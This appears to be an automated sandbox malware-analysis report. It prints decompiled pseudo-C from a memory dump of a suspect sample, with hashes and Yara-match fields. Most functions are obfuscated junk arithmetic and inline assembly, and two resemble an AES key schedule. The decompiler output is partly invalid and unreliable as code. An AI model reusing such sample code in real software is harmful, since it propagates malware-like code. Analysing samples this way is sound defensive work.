                                        										__dl = __dl |  *0x8581d0a;
                                        										__eflags =  *0x34204d21 & __eax;
                                        										__esp = __esp |  *0x58630b68;
                                        										 *0x33611101 =  *0x33611101 << 0x87;
                                        										__eflags =  *0x33611101;
                                        										if( *0x33611101 < 0) {
                                        											 *0x616d6a79 =  *0x616d6a79 + __edx;
                                        											__edx = __edx |  *0x467588ed;
                                        											__ch = __ch +  *0x1506d5e4;
                                        											__bh -  *0x7d1c2fe0 =  *0x650552c4 & 0x076a9cbd;
                                        											__ecx = 0xffffffffbe4dbc06;
                                        											asm("sbb edx, 0xfe2c06ea");
                                        											asm("adc ebx, 0xe4b624ea");
                                        											_pop(__eax);
                                        											 *0x2ba7c934 =  *0x2ba7c934 >> 0x2e;
                                        											 *0xc9f2cf95 =  *0xc9f2cf95 | __ebp;
                                        											asm("adc [0x9da4499f], esp");
                                        											__eax =  *0xe83f106a * 0xcfec;
                                        											__ebx = __ebx - 1;
                                        											asm("sbb esi, 0x6743f107");
                                        											 *0x5a347005 =  *0x5a347005 >> 0x46;
                                        											 *0x22a2bf00 =  *0x22a2bf00 >> 0x25;
                                        											__edx =  *0x1db2726b * 0xd59;
                                        											asm("adc [0x3e8e7880], al");
                                        											L1();
                                        											__edi = __edi ^  *0xf95cf2e8;
                                        											asm("adc [0x9ae59be7], ah");
                                        											__edx =  *0x1db2726b * 0xd59 - 1;
                                        											__cl = __cl |  *0x8ac5a33a;
                                        											__ecx = 0xffffffffa723472a;
                                        											asm("sbb eax, [0x6c870a17]");
                                        											asm("sbb ecx, 0x3487f799");
                                        											_push(__ebp);
                                        											__esi = __esi -  *0xfc03e28c;
                                        											__ebx = __ebx + 0x6301361d;
                                        											__esp = __esp + 1;
                                        											 *0x96208104 =  *0x96208104 ^ __bh;
                                        											__esp = __esp ^  *0xf9d8a68e;
                                        											__cl = __cl & 0x00000080;
                                        											 *0xe7502530 =  *0xe7502530 | __ah;
                                        											__edx =  *0x1db2726b * 0x00000d59 - 0x00000001 &  *0xfd022d93;
                                        											__esp = __esp +  *0x7d638489;
                                        											__eflags = __cl & 0x000000a2;
                                        											 *0xde3d5002 =  *0xde3d5002 << 0x8a;
                                        											__eflags =  *0xde3d5002;
                                        											_push(0xbe4dbc07);
                                        											if( *0xde3d5002 >= 0) {
                                        												__ebp =  *0xfa26627c * 0x7664;
                                        												asm("scasb");
                                        												__bh = 0xf6;
                                        												_pop(__esi);
                                        												asm("lodsb");
                                        												 *0xc40ec7e2 =  *0xc40ec7e2 >> 0xd6;
                                        												__edx = __edx ^  *0xade90ef5;
                                        												__ebx = __ebx &  *0x397249be;
                                        												__edx = __edx ^  *0x8a4d6b19;
                                        												 *0x4bfe2d1e =  *0x4bfe2d1e >> 0x83;
                                        												asm("adc edi, 0xbd65d411");
                                        												asm("cmpsw");
                                        												__ebx = __ebx +  *0x3783ead6;
                                        												asm("sbb [0x8a0ae3f9], ch");
                                        												__esi =  *0xeb51e766;
                                        												__esp = __esp - 0x9192f;
                                        												 *0xf869331c =  *0xf869331c >> 0x5b;
                                        												__edx = __edx ^  *0x795e2337;
                                        												__edx = __edx &  *0x4eb3e265;
                                        												asm("sbb [0xdff0cd0d], eax");
                                        												 *0xf2b27504 =  *0xf2b27504 >> 0xdd;
                                        												asm("adc ebx, [0x29f4c48b]");
                                        												_t25 = __edi;
                                        												__edi =  *0x3d96c28b;
                                        												 *0x3d96c28b = _t25;
                                        												__ebx =  *0x7d91726b * 0xe2d0;
                                        												 *0x1dfdd520 =  *0x1dfdd520 >> 0x1b;
                                        												asm("adc [0xa554d6b3], cl");
                                        												asm("scasb");
                                        												__eflags =  *0xc884402d & __esp;
                                        												 *0x48df560d =  *0x48df560d - 0xbe4dbc07;
                                        												 *0x479d2b2 =  *0x479d2b2 ^ 0x000000f6;
                                        												 *0x70fd82fe =  *0x70fd82fe >> 6;
                                        												__edi =  *0x3d96c28b & 0x51c64561;
                                        												__edx = __edx |  *0x9c088abc;
                                        												__ecx = 0xffffffffa723472b;
                                        												 *0x31818238 =  *0x31818238 ^ __ah;
                                        												_pop(__ebp);
                                        												 *0xc7070fc9 =  *0xc7070fc9 >> 0x76;
                                        												__eax = __eax -  *0x3a18090e;
                                        												__eflags = __eax;
                                        												asm("rcl dword [0xbe35bafc], 0x9b");
                                        												asm("sbb ch, [0xce1f4722]");
                                        												_push(__esp);
                                        												asm("sbb [0x175d9011], ebx");
                                        												if(__eax <= 0) {
                                        													__eax = __eax | 0x9267a577;
                                        													asm("rcl dword [0x1f7bc86e], 0xc3");
                                        													__esp = __esp -  *0x1986a41d;
                                        													 *0xd0142f2d = __ebx;
                                        													asm("sbb [0xe6eb17cb], esi");
                                        													__bh = 0x16;
                                        													__eflags = 0xf6;
                                        													if(0xf6 < 0) {
                                        														__edi = __edi +  *0x90e2c979;
                                        														asm("adc edi, [0xddc19fee]");
                                        														__edi =  *0x8a06486b * 0x9435;
                                        														 *0x75617a11 = __ebp;
                                        														__esi = __esi + 1;
                                        														 *0xfff89f85 =  *0xfff89f85 - __ebp;
                                        														__eflags =  *0xfff89f85;
                                        														if( *0xfff89f85 <= 0) {
                                        															asm("rol dword [0x4a841277], 0xf5");
                                        															asm("movsb");
                                        															__eflags =  *0x2f2d1986 & __al;
                                        															__ecx =  *0x33594f0f;
                                        															 *0x498ed69d =  *0x498ed69d ^ __esp;
                                        															 *0x4367720d =  *0x4367720d >> 0xd5;
                                        															asm("lodsb");
                                        															_push(__ebp);
                                        															asm("rcl dword [0x670e54d1], 0x66");
                                        															__ecx =  *0x33594f0f - 0x75021c19;
                                        															__ebp =  *0x29194a1d;
                                        															__ebx = __ebx + 1;
                                        															__eflags = __ebx;
                                        															if(__ebx == 0) {
                                        																asm("sbb edi, [0x4ba5637b]");
                                        																__eflags = __cl - 0xc;
                                        																asm("stosd");
                                        																__eflags =  *0xb18a5e62 & __ebp;
                                        																__ah = __ah - 0xc9;
                                        																_pop(__edx);
                                        																__esi & 0xebc40e03 = __dl & 0x000000e6;
                                        																__ah =  *0x4f5d6d0c;
                                        																__edx = __edx + 1;
                                        																asm("adc esi, [0x356ac89]");
                                        																asm("rcl dword [0xe6ebc40e], 0x95");
                                        																__ch = __ch -  *0x67a5b212;
                                        																__eflags = __esp - 0x2267cac7;
                                        																if(__eflags >= 0) {
                                        																	asm("adc esi, [0xe58adc78]");
                                        																	if(__eflags >= 0) {
                                        																		asm("rol dword [0xabe12572], 0x33");
                                        																		if(__eflags < 0) {
                                        																			asm("sbb [0x15014471], esi");
                                        																			 *0xd665a6ef =  *0xd665a6ef ^ __edi;
                                        																			_t36 = __edi;
                                        																			__edi =  *0x3cda45d1;
                                        																			 *0x3cda45d1 = _t36;
                                        																			_push( *0xb6c52f83);
                                        																			__eflags = __ebx -  *0x2577320d;
                                        																			__ah = __ah ^ 0x000000b3;
                                        																			_pop( *0x5cb1d316);
                                        																			 *0xb9353b11 =  *0xb9353b11 ^ __edi;
                                        																			__esp =  *0x77bdb8bd;
                                        																			_push( *0x77bdb8bd);
                                        																			asm("adc ebp, [0x1c1787db]");
                                        																			asm("movsb");
                                        																			 *0x2f2d1986 =  *0x2f2d1986 | __ah;
                                        																			asm("adc ah, 0x14");
                                        																			asm("rcr dword [0x712cbfd], 0xf1");
                                        																			__al = __al ^ 0x00000010;
                                        																			asm("adc dh, [0x582a600]");
                                        																			asm("sbb dl, 0xb5");
                                        																			__ebp = __ebp &  *0x7f6e2531;
                                        																			__eflags =  *0x8a0648be & __edi;
                                        																			__ebx = __ebx + 0x9c129435;
                                        																			_push( *0xe77b8e89);
                                        																			_pop( *0xba4c899);
                                        																			__eflags = __ebx -  *0xf7ef31bc;
                                        																			__ah = __ah + 0xe1;
                                        																			__eflags = __ah;
                                        																			asm("stosd");
                                        																			if(__ah < 0) {
                                        																				__eax = 0x10014471;
                                        																				asm("ror dword [0x7f007487], 0x95");
                                        																				 *0xfc2168c6 = __ch;
                                        																				 *0x9e354588 =  *0x9e354588 + __dl;
                                        																				 *0xa26495f5 =  *0xa26495f5 >> 0x37;
                                        																				 *0x65d72d12 =  *0x65d72d12 - 0xf6;
                                        																				__ecx = 0x4e8c56dd;
                                        																				2 = 2 -  *0x13da4eb3;
                                        																				__eflags = __esp -  *0x30252fba;
                                        																				__esp = __esp - 1;
                                        																				asm("sbb eax, 0xbbb81401");
                                        																				_pop( *0x66f1fc9f);
                                        																				__edi =  *0x30936406;
                                        																				__eflags = __edi -  *0xeff5b4bf;
                                        																				asm("adc [0x8a06486f], edi");
                                        																				__eflags = __edi -  *0xf90f9435;
                                        																				__esi = __esi +  *0x460115de;
                                        																				 *0x38ce0665 =  *0x38ce0665 << 0x38;
                                        																				__ebp = __ebp &  *0x1f4722bd;
                                        																				 *0x621454ce =  *0x621454ce << 0xbe;
                                        																				asm("sbb ebx, 0x6ea77a19");
                                        																				__eflags =  *0x93e27b9d & __ebx;
                                        																				asm("adc [0x87a1b707], edx");
                                        																				asm("rcr dword [0x8a0648c1], 0x95");
                                        																				__esi = __esi |  *0xbf149435;
                                        																				asm("adc ebp, [0xa9c2fcba]");
                                        																				__edi =  *0xaa8c369a;
                                        																				__eax = 0x10014471;
                                        																				_pop( *0xd8b47dba);
                                        																				__eax =  *0x8a064869 * 0x9435;
                                        																				asm("sbb ch, [0x93b7c612]");
                                        																				__eflags = __ah & 0x000000f6;
                                        																				__esp = __esp &  *0x345cba1e;
                                        																				__eflags =  *0x71abe1f2 & __bl;
                                        																				__esp = __esp + 1;
                                        																				 *0x8a064869 * 0x00009435 &  *0x1b7e0e01 =  *0x8a064869 * 0x00009435 &  *0x1b7e0e01 | 0xe97f586e;
                                        																				asm("adc ebp, [0xeb11fa93]");
                                        																				 *0x4ba04f61 =  *0x4ba04f61 - 0x4e8c56dd;
                                        																				__esp = __esp ^ 0xec1d5b13;
                                        																				__eax = 0x15a985bc;
                                        																				__esp = __esp - 1;
                                        																				_push( *0x3df627ee);
                                        																				__esp = __esp -  *0x3b305ad4;
                                        																			}
                                        																		}
                                        																	}
                                        																}
                                        															}
                                        														}
                                        													}
                                        												}
                                        											}
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				while(1) {
                                        					L1:
                                        					_t46 = _t46 &  *0x963408d2;
                                        					 *0x7a0d8ba2 =  *0x7a0d8ba2 - 0x3cc14109;
                                        					_t52 = _t52 + 1;
                                        					asm("sbb [0x3644e3a0], ch");
                                        					asm("adc al, [0xc626bb6]");
                                        					if(_t45 !=  *0xf205cdb5) {
                                        						continue;
                                        					}
                                        					L2:
                                        					_t53 = _t53 +  *0xcf63b7b;
                                        					_t46 = _t46 +  *0x77da6d88;
                                        					 *0xe6035f64 =  *0xe6035f64 ^ _t53;
                                        					asm("adc dl, 0x8");
                                        					if( *0xe6035f64 >= 0) {
                                        						while(1) {
                                        							L1:
                                        							_t46 = _t46 &  *0x963408d2;
                                        							 *0x7a0d8ba2 =  *0x7a0d8ba2 - 0x3cc14109;
                                        							_t52 = _t52 + 1;
                                        							asm("sbb [0x3644e3a0], ch");
                                        							asm("adc al, [0xc626bb6]");
                                        							if(_t45 !=  *0xf205cdb5) {
                                        								continue;
                                        							}
                                        							goto L2;
                                        							do {
                                        								goto L1;
                                        							} while (_t45 !=  *0xf205cdb5);
                                        							goto L2;
                                        						}
                                        					} else {
                                        						asm("adc edi, 0xe2bbec73");
                                        						asm("adc [0xc9901399], ebx");
                                        						 *0x660d6abc =  *0x660d6abc - _t55;
                                        						_push(0x3cc14109);
                                        						_t55 = _t55 &  *0x4fb89bf0;
                                        						_t46 =  *0x13625927;
                                        						 *0x25ac2593 =  *0x25ac2593 >> 0x89;
                                        						 *0x1d63b395 =  *0x1d63b395 ^ _t56;
                                        						if(0x3cc1410a <= 0) {
                                        							continue;
                                        						} else {
                                        							 *0x310136c9 =  *0x310136c9 << 0x39;
                                        							asm("sbb ebp, [0xd839c0c5]");
                                        							return _t45;
                                        						}
                                        					}
                                        					L1:
                                        					_t46 = _t46 &  *0x963408d2;
                                        					 *0x7a0d8ba2 =  *0x7a0d8ba2 - 0x3cc14109;
                                        					_t52 = _t52 + 1;
                                        					asm("sbb [0x3644e3a0], ch");
                                        					asm("adc al, [0xc626bb6]");
                                        				}
                                        			}











                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17bb315930af4e2e6efe70db28cd7d92475ccdd94bb8c934770465384c7f009c
                                        • Instruction ID: 00ee6f9bfc5c9569285fa1df4217ca6e4b8ecc935c0492086613916bfffb1b0c
                                        • Opcode Fuzzy Hash: 17bb315930af4e2e6efe70db28cd7d92475ccdd94bb8c934770465384c7f009c
                                        • Instruction Fuzzy Hash: DB023F32918791CFD715CF39D98AB423FB2F396324B08424EC9A1A75D2D338655ACF89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 38%
                                        			E0041E1B3(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                        				signed char _t33;
                                        				signed char _t34;
                                        				void* _t35;
                                        				signed int _t36;
                                        				signed char _t44;
                                        				void* _t48;
                                        				void* _t51;
                                        				signed int _t54;
                                        				intOrPtr _t60;
                                        				signed int _t71;
                                        				signed int _t72;
                                        				signed int _t77;
                                        				void* _t78;
                                        				signed int _t79;
                                        
                                        				_t75 = __esi;
                                        				 *0xc16efa8 =  *0xc16efa8 + __edx;
                                        				_t54 = __ecx - 1;
                                        				asm("adc dh, [0xc48616d2]");
                                        				 *0xddbd3ccd =  *0xddbd3ccd ^ _t77;
                                        				asm("adc ebp, [0xb70016ef]");
                                        				_t33 = __eax & 0x88;
                                        				asm("scasd");
                                        				_pop(_t71);
                                        				_t78 = _t77 -  *0x16d24939;
                                        				asm("sbb bl, [0x54942410]");
                                        				 *0xaddd0fb4 =  *0xaddd0fb4 | _t33;
                                        				 *0xef45d88d =  *0xef45d88d | _t79;
                                        				_t60 = __edx +  *0x90e04c16;
                                        				if(_t60 > 0) {
                                        					L1:
                                        					_t33 = _t33 -  *0xb0939ff7;
                                        					_t78 = _t78 - 1;
                                        					_t44 = 0xb7 +  *0xe217dc62 - 0xc4bbc419;
                                        					 *0x759084e5 =  *0x759084e5 - _t44;
                                        					_t75 = _t75 - 1;
                                        					 *0xd173aeb0 =  *0xd173aeb0 & _t44;
                                        				} else {
                                        					asm("ror dword [0xa8008977], 0x63");
                                        					 *0x45d8a8c4 =  *0x45d8a8c4 << 0x48;
                                        					__esp = __esp |  *0x9e3f16ef;
                                        					__edx = __edx -  *0x40ecb2a1;
                                        					 *0x826380d6 =  *0x826380d6 + __esp;
                                        					 *0xa8c4a800 =  *0xa8c4a800 ^ __ah;
                                        					asm("rcr dword [0x16ef45d8], 0x8e");
                                        					asm("adc edi, [0x9fe24b16]");
                                        					asm("adc esp, [0x49395fc2]");
                                        					_t30 = __dh;
                                        					__dh =  *0x941616d2;
                                        					 *0x941616d2 = _t30;
                                        					 *0xdec32e33 =  *0xdec32e33 ^ __edx;
                                        					__esi = __esi ^  *0xe0cc32c1;
                                        					__dh =  *0x941616d2 - 0xa8;
                                        					 *0xd8a8c4a8 =  *0xd8a8c4a8 >> 0x7c;
                                        					__ebp = __ebp + 1;
                                        					asm("adc [0xd6b616ef], ecx");
                                        					if(__ebp < 0) {
                                        						goto L1;
                                        						do {
                                        							do {
                                        								do {
                                        									do {
                                        										goto L1;
                                        									} while ( *0xd173aeb0 < 0);
                                        									_t34 = _t33 & 0xddbd1c2f;
                                        									 *0xe0cc32c1 =  *0xe0cc32c1 & _t34;
                                        									_t79 = _t79 ^ 0xca2585c0;
                                        									_t54 = _t54 ^  *0xcc32b2ef;
                                        									asm("cmpsb");
                                        									asm("rcr dword [0xcc32c1da], 0xb7");
                                        									_t9 = _t60;
                                        									_t60 =  *0x16efa8e0;
                                        									 *0x16efa8e0 = _t9;
                                        									asm("rol dword [0x7775c839], 0x0");
                                        									_t33 = _t34 ^  *0xef45d8a8;
                                        									_t48 =  *0x16efa8e0 +  *0x98b7a16;
                                        									asm("rcr byte [0xa8e0cc32], 0xe9");
                                        									_push(0xc83816ef);
                                        								} while ( *0xc1c68ff2 != _t33);
                                        								_t35 = _t33 + 1;
                                        								_push(_t35);
                                        								asm("sbb [0xef45d88d], ebp");
                                        								_push( *0x81d04116);
                                        								asm("sbb ch, 0x3a");
                                        								_t71 = _t71 ^  *0x81c42916;
                                        								_t36 = _t35;
                                        								 *0xef45d88d =  *0xef45d88d - _t78;
                                        								 *0xa1e75531 =  *0xa1e75531 - ((_t60 -  *0x4052173a |  *0xef45d88d) ^ 0x00000010);
                                        								 *0xef453d99 = _t79;
                                        								 *0xfd32ee16 =  *0xfd32ee16 - _t71;
                                        								_pop( *0x831db40f);
                                        								asm("adc edx, [0x6d2b16ef]");
                                        								_t54 =  *0xe0cc32c1;
                                        								asm("rol byte [0x8a16efa8], 0xe6");
                                        								 *0xbe17ff2f =  *0xbe17ff2f >> 0x9a;
                                        								_push( *0xcc32bfdd);
                                        								asm("rol byte [0x16efa8e0], 0x99");
                                        								_t33 = _t36 ^ 0xcc32c5f7;
                                        								asm("rcl byte [0x16efa8e0], 0x9e");
                                        								_t51 = (_t48 +  *0x9cba1d16 & 0x000000c6) +  *0x4fa34f2;
                                        								 *0x32b9d9b0 = _t33;
                                        								_t79 = _t79 + 0xefa8e0cc;
                                        								_t60 =  *0xb3c62116;
                                        								 *0xd601ee67 =  *0xd601ee67 | _t54;
                                        								_t75 = 0x8dddabb;
                                        								 *0xa2f716d2 =  *0xa2f716d2 >> 3;
                                        							} while (0x52173a7b <= 0);
                                        							_push( *0x395f828e);
                                        							asm("ror byte [0x36b616d2], 0x22");
                                        							asm("ror dword [0xebb8140b], 0x81");
                                        							_t72 = _t71 &  *0xcc32aece;
                                        							 *0x9c01269e =  *0x9c01269e + 0x8dddabb;
                                        							asm("scasd");
                                        							asm("rcl byte [0x5fc3ccf9], 0x56");
                                        							 *0x16d24939 =  *0x16d24939 + (_t54 - 0x00000001 -  *0xa816efa8 &  *0x9d8d8ce2);
                                        							_t60 = _t60 - 0x869af2ba + 1;
                                        							 *0xf2c1ab9c =  *0xf2c1ab9c - _t72;
                                        							 *0x416efa8 =  *0x416efa8 - (_t33 &  *0xcc32c1d7);
                                        							_t75 = 0xbda7983e;
                                        							 *0x5fbed3f5 =  *0x5fbed3f5 - _t51;
                                        							_t79 = _t79 +  *0xe0cc32cc & 0x16d24939;
                                        							asm("ror byte [0x71c621c], 0x77");
                                        							asm("movsb");
                                        							_t54 = 0xffffffffe0cc31da;
                                        							_t33 =  *0xa899d1b4;
                                        							_pop(_t71);
                                        							asm("adc edx, 0x16d24939");
                                        						} while (_t72 +  *0x16ef45d8 !=  *0x9ba0f4be);
                                        						asm("adc edi, [0x2e33947a]");
                                        						return _t33;
                                        					} else {
                                        						_push( *0x52173a78);
                                        						__eax = __eax + 1;
                                        						_push(__eax);
                                        						asm("rol dword [0xef45d88d], 0x18");
                                        						__al = __al | 0x00000016;
                                        						return __eax;
                                        					}
                                        				}
                                        			}


















                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 67%
                                        			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                                        				signed int _t66;
                                        				signed int* _t69;
                                        				signed int* _t81;
                                        				signed int _t94;
                                        				signed int _t96;
                                        				signed int _t106;
                                        				signed int _t108;
                                        				signed int* _t110;
                                        				signed int _t127;
                                        				signed int _t129;
                                        				signed int _t133;
                                        				signed int _t152;
                                        				intOrPtr _t171;
                                        
                                        				_t81 = _a12;
                                        				_t110 = _a8;
                                        				asm("ror esi, 0x8");
                                        				asm("rol eax, 0x8");
                                        				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
                                        				asm("ror edi, 0x8");
                                        				asm("rol esi, 0x8");
                                        				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
                                        				asm("ror edi, 0x8");
                                        				asm("rol esi, 0x8");
                                        				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
                                        				_t66 =  &(_t110[1]);
                                        				asm("ror edi, 0x8");
                                        				asm("rol esi, 0x8");
                                        				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
                                        				asm("ror edi, 0x8");
                                        				asm("rol esi, 0x8");
                                        				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
                                        				asm("ror edi, 0x8");
                                        				asm("rol esi, 0x8");
                                        				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
                                        				asm("ror edi, 0x8");
                                        				asm("rol esi, 0x8");
                                        				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
                                        				asm("ror esi, 0x8");
                                        				asm("rol ecx, 0x8");
                                        				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
                                        				if(_a16 != 0x100) {
                                        					L4:
                                        					return _t66 | 0xffffffff;
                                        				} else {
                                        					_t171 = _a4;
                                        					_t69 = 0;
                                        					_a12 = 0;
                                        					while(1) {
                                        						_t152 =  *(_t66 + 0x18);
                                        						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                                        						_t127 =  *_t66 ^ _t94;
                                        						 *(_t66 + 0x1c) = _t94;
                                        						_t96 =  *(_t66 + 4) ^ _t127;
                                        						 *(_t66 + 0x20) = _t127;
                                        						_t129 =  *(_t66 + 8) ^ _t96;
                                        						 *(_t66 + 0x24) = _t96;
                                        						 *(_t66 + 0x28) = _t129;
                                        						if(_t69 == 6) {
                                        							break;
                                        						}
                                        						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                                        						_t133 =  *(_t66 + 0x10) ^ _t106;
                                        						 *(_t66 + 0x2c) = _t106;
                                        						_t108 =  *(_t66 + 0x14) ^ _t133;
                                        						 *(_t66 + 0x34) = _t108;
                                        						_t69 =  &(_a12[0]);
                                        						 *(_t66 + 0x30) = _t133;
                                        						 *(_t66 + 0x38) = _t108 ^ _t152;
                                        						_t66 = _t66 + 0x20;
                                        						_a12 = _t69;
                                        						if(_t69 < 7) {
                                        							continue;
                                        						} else {
                                        							goto L4;
                                        						}
                                        						goto L6;
                                        					}
                                        					return 0xe;
                                        				}
                                        				L6:
                                        			}

















                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E00402D87(void* __eax, signed int __ecx, void* __edx, signed char* __edi, signed int* _a4, signed int* _a8, intOrPtr _a12) {
                                        				signed int _t70;
                                        				intOrPtr _t75;
                                        				signed int* _t90;
                                        				signed int _t103;
                                        				signed int _t105;
                                        				signed int _t115;
                                        				signed int _t117;
                                        				signed int* _t120;
                                        				signed int _t137;
                                        				signed int _t139;
                                        				signed int _t143;
                                        				signed int _t164;
                                        				signed int* _t186;
                                        
                                        				 *__edi =  *__edi << __ecx;
                                        				_push(_t188);
                                        				_t90 = _a8;
                                        				_t120 = _a4;
                                        				_push(__edi);
                                        				asm("ror esi, 0x8");
                                        				asm("rol eax, 0x8");
                                        				 *_t120 =  *_t90 & 0xff00ff00 |  *_t90 & 0x00ff00ff;
                                        				asm("ror edi, 0x8");
                                        				asm("rol esi, 0x8");
                                        				_t120[1] = _t90[1] & 0xff00ff00 | _t90[1] & 0x00ff00ff;
                                        				asm("ror edi, 0x8");
                                        				asm("rol esi, 0x8");
                                        				_t120[2] = _t90[2] & 0xff00ff00 | _t90[2] & 0x00ff00ff;
                                        				_t70 =  &(_t120[1]);
                                        				asm("ror edi, 0x8");
                                        				asm("rol esi, 0x8");
                                        				_t120[3] = _t90[3] & 0xff00ff00 | _t90[3] & 0x00ff00ff;
                                        				asm("ror edi, 0x8");
                                        				asm("rol esi, 0x8");
                                        				_t120[4] = _t90[4] & 0xff00ff00 | _t90[4] & 0x00ff00ff;
                                        				asm("ror edi, 0x8");
                                        				asm("rol esi, 0x8");
                                        				_t120[5] = _t90[5] & 0xff00ff00 | _t90[5] & 0x00ff00ff;
                                        				asm("ror edi, 0x8");
                                        				asm("rol esi, 0x8");
                                        				_t120[6] = _t90[6] & 0xff00ff00 | _t90[6] & 0x00ff00ff;
                                        				asm("ror esi, 0x8");
                                        				asm("rol ecx, 0x8");
                                        				_t120[7] = _t90[7] & 0xff00ff00 | _t90[7] & 0x00ff00ff;
                                        				if(_a12 != 0x100) {
                                        					L5:
                                        					return _t70 | 0xffffffff;
                                        				} else {
                                        					_t186 = _a4;
                                        					_t75 = 0;
                                        					_a12 = 0;
                                        					while(1) {
                                        						_t164 =  *(_t70 + 0x18);
                                        						_t103 = ( *(_t186 + 4 + (_t164 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t186 + _t75 + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t186 + 4 + (_t164 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t186 + 5 + (_t164 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t186 + 4 + (_t164 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t70 - 4);
                                        						_t137 =  *_t70 ^ _t103;
                                        						 *(_t70 + 0x1c) = _t103;
                                        						_t105 =  *(_t70 + 4) ^ _t137;
                                        						 *(_t70 + 0x20) = _t137;
                                        						_t139 =  *(_t70 + 8) ^ _t105;
                                        						 *(_t70 + 0x24) = _t105;
                                        						 *(_t70 + 0x28) = _t139;
                                        						if(_t75 == 6) {
                                        							break;
                                        						}
                                        						_t115 = ( *(_t186 + 4 + (_t139 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t186 + 4 + (_t139 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t186 + 4 + (_t139 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t186 + 5 + (_t139 & 0x000000ff) * 4) & 0x000000ff ^  *(_t70 + 0xc);
                                        						_t143 =  *(_t70 + 0x10) ^ _t115;
                                        						 *(_t70 + 0x2c) = _t115;
                                        						_t117 =  *(_t70 + 0x14) ^ _t143;
                                        						 *(_t70 + 0x34) = _t117;
                                        						_t75 = _a12 + 1;
                                        						 *(_t70 + 0x30) = _t143;
                                        						 *(_t70 + 0x38) = _t117 ^ _t164;
                                        						_t70 = _t70 + 0x20;
                                        						_a12 = _t75;
                                        						if(_t75 < 7) {
                                        							continue;
                                        						} else {
                                        							goto L5;
                                        						}
                                        						goto L7;
                                        					}
                                        					return 0xe;
                                        				}
                                        				L7:
                                        			}

















                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6e67db1d354929354088c827f54701e88fb9f8989a2517c6c3d9152d3054abc1
                                        • Instruction ID: 75fa89b1fa8ebfd7e887b99783bb356bdecfec21f91e26982db3e11008c4c9bc
                                        • Opcode Fuzzy Hash: 6e67db1d354929354088c827f54701e88fb9f8989a2517c6c3d9152d3054abc1
                                        • Instruction Fuzzy Hash: F35183B3E14A214BD3188F09CC40631B792EFC8312B5F81BEDD199B397CE74A9529A90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 45%
                                        			E0041DAB4(void* __eax, signed char __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi) {
                                        				void* _t21;
                                        				signed char _t22;
                                        				void* _t33;
                                        				signed int _t35;
                                        				signed int _t36;
                                        				void* _t37;
                                        				signed int _t38;
                                        
                                        				_t22 = __ebx;
                                        				_t21 = __eax;
                                        				_t38 = _t37 -  *0xcdc9dcf;
                                        				_t35 = __esi -  *0xda30a4c4;
                                        				_pop( *0x16b3258b);
                                        				asm("adc ebp, [0xc5cb1d3]");
                                        				_t33 = __edi - 1;
                                        				asm("adc [0xc40e031a], ah");
                                        				 *0x8914e6eb =  *0x8914e6eb << 0x16;
                                        				 *0xe871ff85 =  *0xe871ff85 ^ _t38;
                                        				asm("sbb esp, 0x3b1937cd");
                                        				asm("adc [0x8a0648b5], cl");
                                        				if((__edx & 0xa20fa2eb ^  *0xf00f9435 |  *0xbf7e39b3) != 0) {
                                        					L1:
                                        					_t22 = _t22 &  *0x963408d2;
